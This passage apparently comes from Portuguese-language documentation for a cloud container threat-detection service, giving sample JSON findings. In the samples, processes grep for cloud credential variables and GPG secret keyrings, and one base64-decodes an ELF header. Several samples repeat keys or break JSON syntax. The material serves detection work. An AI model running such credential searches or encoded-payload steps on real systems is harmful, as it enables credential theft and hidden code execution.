"detectionCategory": {       "ruleName": "ktd_steganography_tool_detected"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1001/002/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Acesso a credenciais: encontrar Google Cloud credenciais

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Credential Access: Find Google Cloud Credentials",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "CREDENTIAL_ACCESS",       "primaryTechniques": [         "UNSECURED_CREDENTIALS",         "PRIVATE_KEYS"       ]       "additionalTactics": [         "COLLECTION",         "DISCOVERY"       ]       "additionalTechniques": [         "AUTOMATED_COLLECTION",         "CREDENTIALS_FROM_PASSWORD_STORES",         "BASH_HISTORY"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "ESCAPE_TO_HOST"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/bin/grep\"",           "size": "219456",           "sha256": "c0a251c2e9a59e9e5db752c14857e51e17c0771af338b602bb9ccadc23a2ee7f",           "hashedSize": "219456",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"grep\"",           "\"GOOGLE_APPLICATION_CREDENTIALS\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"HOSTNAME\"",             "val": "\"CONTAINER_NAME\""           },         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "LOW",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_find_gcp_credentials"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0006/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/c0a251c2e9a59e9e5db752c14857e51e17c0771af338b602bb9ccadc23a2ee7f/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Acesso a credenciais: reconhecimento de chaves GPG

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Credential Access: GPG Key Reconnaissance",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "CREDENTIAL_ACCESS",       "primaryTechniques": [         "UNSECURED_CREDENTIALS",         "PRIVATE_KEYS"       ]       "additionalTactics": [         "DISCOVERY",         "RECONNAISSANCE"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/bin/grep\"",           "size": "219456",           "sha256": "c0a251c2e9a59e9e5db752c14857e51e17c0771af338b602bb9ccadc23a2ee7f",           "hashedSize": "219456",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"grep\"",           "\"secring\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"HOSTNAME\"",             "val": "\"CONTAINER_NAME\""           },         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_gpg_key_reconnaissance"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0006/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/c0a251c2e9a59e9e5db752c14857e51e17c0771af338b602bb9ccadc23a2ee7f/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Acesso a credenciais: pesquisar chaves privadas ou palavras-passe

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Credential Access: Search Private Keys or Passwords",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "ESCAPE_TO_HOST"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-search-private-keys-or-passwords-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "LOW",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_search_private_keys_or_passwords"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1552/001/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Evasão de defesa: iniciar ferramenta de compilação de código no contentor (pré-visualização)

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Defense Evasion: Launch Code Compiler Tool In Container",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "DEFENSE_EVASION",       "primaryTechniques": [         "OBFUSCATED_FILES_OR_INFO"       ],       "additionalTactics": [         "RESOURCE_DEVELOPMENT",         "EXECUTION",         "CREDENTIAL_ACCESS"       ],       "additionalTechniques": [         "STAGE_CAPABILITIES",         "SOFTWARE_DEPLOYMENT_TOOLS",         "UNSECURED_CREDENTIALS"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-launch-code-compiler-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "LOW",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_launch_code_compiler_tool_in_container"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1027/004/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Evasão de defesa: linha de comandos de ficheiro ELF Base64

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Defense Evasion: Base64 ELF File Command Line",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "DEFENSE_EVASION",       "primaryTechniques": [         "OBFUSCATED_FILES_OR_INFO",         "DEOBFUSCATE_DECODE_FILES_OR_INFO"       ],       "additionalTactics": [         "EXECUTION"       ],       "additionalTechniques": [         "COMMAND_AND_SCRIPTING_INTERPRETER",         "UNIX_SHELL"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/usr/bin/base64\"",           "size": "39096",           "sha256": "a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84",           "hashedSize": "39096",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"base64\"",           "\"-d\"",           "\"f0VMRgIB\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"HOSTNAME\"",             "val": "\"CONTAINER_NAME\""           },         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "MEDIUM",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_base64_elf_file_cmdline"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0005/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Defense Evasion: Base64 Encoded Python Script Executed

